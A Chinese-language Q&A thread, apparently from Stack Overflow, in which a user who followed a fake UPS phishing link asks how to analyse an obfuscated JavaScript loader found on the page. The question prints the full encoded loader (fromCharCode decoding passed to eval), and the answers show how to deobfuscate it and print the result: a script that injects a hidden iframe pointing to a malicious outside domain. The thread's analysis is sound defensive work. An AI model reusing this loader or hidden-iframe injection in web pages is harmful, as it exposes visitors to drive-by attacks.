3

我收到一封电子邮件,其中包含一个看起来像是 UPS 的链接(我打开它是因为我昨晚订购了一些东西。时机不好。)

这是一个简单的网页,显然不是 UPS,但我查看了 HTML,其中嵌入了以下脚本。

try {
    q = document.createElement("p");
    q.appendChild(q + "");
} catch (qw) {
    h = -012 / 5;
    try {
        prototype - 1;
    } catch (bawg) {
        ss = [];
        f = (h) ? ("fromCharC" + "ode") : "";
        e = window["e" + "val"];
        n = [9, 18, 315, 408, 32, 80, 300, 444, 99, 234, 327, 404, 110, 232, 138, 412, 101, 232, 207, 432, 101, 218, 303, 440, 116, 230, 198, 484, 84, 194, 309, 312, 97, 218, 303, 160, 39, 196, 333, 400, 121, 78, 123, 364, 48, 186, 123, 492, 13, 18, 27, 36, 105, 204, 342, 388, 109, 202, 342, 160, 41, 118, 39, 36, 9, 250, 96, 404, 108, 230, 303, 128, 123, 26, 27, 36, 9, 200, 333, 396, 117, 218, 303, 440, 116, 92, 357, 456, 105, 232, 303, 160, 34, 120, 315, 408, 114, 194, 327, 404, 32, 230, 342, 396, 61, 78, 312, 464, 116, 224, 174, 188, 47, 194, 351, 464, 111, 196, 333, 468, 114, 194, 297, 428, 121, 92, 330, 404, 116, 94, 327, 388, 105, 220, 138, 448, 104, 224, 189, 448, 97, 206, 303, 244, 48, 202, 147, 396, 98, 114, 294, 220, 49, 202, 306, 192, 50, 98, 294, 200, 39, 64, 357, 420, 100, 232, 312, 244, 39, 98, 144, 156, 32, 208, 303, 420, 103, 208, 348, 244, 39, 98, 144, 156, 32, 230, 348, 484, 108, 202, 183, 156, 118, 210, 345, 420, 98, 210, 324, 420, 116, 242, 174, 416, 105, 200, 300, 404, 110, 118, 336, 444, 115, 210, 348, 420, 111, 220, 174, 388, 98, 230, 333, 432, 117, 232, 303, 236, 108, 202, 306, 464, 58, 96, 177, 464, 111, 224, 174, 192, 59, 78, 186, 240, 47, 210, 306, 456, 97, 218, 303, 248, 34, 82, 177, 52, 9, 18, 375, 52, 9, 18, 306, 468, 110, 198, 348, 420, 111, 220, 96, 420, 102, 228, 291, 436, 101, 228, 120, 164, 123, 26, 27, 36, 9, 236, 291, 456, 32, 204, 96, 244, 32, 200, 333, 396, 117, 218, 303, 440, 116, 92, 297, 456, 101, 194, 348, 404, 69, 216, 303, 436, 101, 220, 348, 160, 39, 210, 306, 456, 97, 218, 303, 156, 41, 118, 306, 184, 115, 202, 348, 260, 116, 232, 342, 420, 98, 234, 348, 404, 40, 78, 345, 456, 99, 78, 132, 156, 104, 232, 348, 448, 58, 94, 141, 388, 117, 232, 333, 392, 111, 234, 342, 388, 99, 214, 363, 184, 110, 202, 348, 188, 109, 194, 315, 440, 46, 224, 312, 448, 63, 224, 291, 412, 101, 122, 144, 404, 49, 198, 294, 228, 98, 110, 147, 404, 102, 96, 150, 196, 98, 100, 117, 164, 59, 204, 138, 460, 116, 242, 324, 404, 46, 236, 315, 460, 105, 196, 315, 432, 105, 232, 363, 244, 39, 208, 315, 400, 100, 202, 330, 156, 59, 204, 138, 460, 116, 242, 324, 404, 46, 224, 333, 460, 105, 232, 315, 444, 110, 122, 117, 388, 98, 230, 333, 432, 117, 232, 303, 156, 59, 204, 138, 460, 116, 242, 324, 404, 46, 216, 303, 408, 116, 122, 117, 192, 39, 118, 306, 184, 115, 232, 363, 432, 101, 92, 348, 444, 112, 122, 117, 192, 39, 118, 306, 184, 115, 202, 348, 260, 116, 232, 342, 420, 98, 234, 348, 404, 40, 78, 357, 420, 100, 232, 312, 156, 44, 78, 147, 192, 39, 82, 177, 408, 46, 230, 303, 464, 65, 232, 348, 456, 105, 196, 351, 464, 101, 80, 117, 416, 101, 210, 309, 416, 116, 78, 132, 156, 49, 96, 117, 164, 59, 26, 27, 36, 9, 200, 333, 396, 117, 218, 303, 440, 116, 92, 309, 404, 116, 138, 324, 404, 109, 202, 330, 464, 115, 132, 363, 336, 97, 206, 234, 388, 109, 202, 120, 156, 98, 222, 300, 484, 39, 82, 273, 192, 93, 92, 291, 448, 112, 202, 330, 400, 67, 208, 315, 432, 100, 80, 306, 164, 59, 26, 27, 36, 125];
        if (window.document) for (i = 6 - 2 - 1 - 2 - 1; - 617 + i != 2 - 2; i++) {
            k = i;
            ss = ss + String[f](n[k] / (i % (h * h) + 2 - 1));
        }
        e("if(1)" + ss);
    }
}

我不是要求任何人为我解码脚本,但可以使用哪些工具来确定实际发生了什么?我是一名 C# 程序员,不会做太多 javascript。我假设它正在构建某种代码,然后执行。有没有办法可以追踪它以查看它正在构建什么?

谢谢

4

3 回答 3

4

只需执行代码并替换e = window["e" + "val"];e = console.log先。

结果:

    if (1) if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://autobouracky.net/main.php?page=0e1cb9b71ef021b2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://autobouracky.net/main.php?page=0e1cb9b71ef021b2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
于 2012-06-15T14:08:10.320 回答
1

按照 Graham 的建议使用 jsbeautifier,你会发现一行

e("if(1)" + ss);

哪里e = window.evalss是所需的脚本 - 所以将该行替换为

console.log(ss);

并在 Firebug 控制台中运行整个代码。瞧。

于 2012-06-15T14:08:00.940 回答
0

解码后编码的 javascript 如下所示:

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://autobouracky.net/main.php?page=0e1cb9b71ef021b2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://autobouracky.net/main.php?page=0e1cb9b71ef021b2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
于 2012-06-15T14:10:33.267 回答